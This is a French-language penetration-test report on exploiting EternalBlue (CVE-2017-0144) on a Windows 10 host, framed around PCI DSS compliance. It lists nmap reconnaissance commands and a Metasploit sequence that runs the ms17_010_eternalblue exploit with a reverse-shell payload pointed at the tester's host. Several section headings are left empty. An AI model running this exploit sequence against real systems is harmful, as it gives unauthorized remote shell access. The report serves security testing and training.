
Ce rapport décrit un engagement VAPT structuré axé sur la conformité PCI DSS, l'énumération des services SMB et l'exploitation de CVE-2017-0144 (EternalBlue) sur une machine Windows 10 au sein d'une infrastructure orientée finance.
Les institutions financières sont confrontées à certaines des exigences de conformité les plus strictes dans le domaine de la cybersécurité. Avec des données clients sensibles et des informations de titulaires de carte en jeu, des erreurs de configuration de sécurité peuvent entraîner des violations catastrophiques. Cette simulation VAPT a été réalisée pour évaluer la posture de sécurité d'un système d'extrémité basé sur Windows 10 du point de vue de la conformité PCI DSS, tout en identifiant et en exploitant les vulnérabilités connues dans les services SMB exposés.
La simulation couvre plusieurs étapes, de la reconnaissance et du scan de vulnérabilités à l'aide de Nessus à l'exploitation réelle via Metasploit. Le rapport souligne en outre l'importance du durcissement des points de terminaison, de la gestion des correctifs, de l'application des pare-feu et de l'alignement PCI DSS pour maintenir l'intégrité des réseaux financiers.
Préparé par : Aditya Bhatt
Fonction : Analyste VAPT | Professionnel en cybersécurité
Contact : [email protected] | +91-9818993884
Ce rapport présente les résultats d'un test d'intrusion mené sur un point de terminaison Windows 10 soupçonné de traiter des données financières et des transactions par carte de crédit. L'objectif était de valider les implémentations de contrôles PCI DSS et d'identifier les vecteurs d'attaque potentiels qui pourraient compromettre les données des titulaires de carte.
À l'aide de Nessus, l'hôte s'est avéré vulnérable à CVE-2017-0144 (EternalBlue) — une vulnérabilité SMB critique. Le framework Metasploit a ensuite été utilisé pour exploiter cette faille et obtenir un accès shell distant non autorisé. Ce rapport souligne l'importance d'une gestion rapide des correctifs et du durcissement des services réseau pour éviter les violations de données dans les systèmes financiers.
Six objectifs principaux et douze exigences du PCI DSS ont été examinés. Les principes clés incluent :
Système cible :
10.10.195.105255.0.0.0Outils utilisés :
Commandes clés :
nmap -sn 10.10.195.105
nmap -sV -p445 10.10.195.105
nmap -F 10.10.195.105
Scanneur :
Tentative de scan Nessus :
Tentative de scan Metasploit :
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run
Module d'exploitation :
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit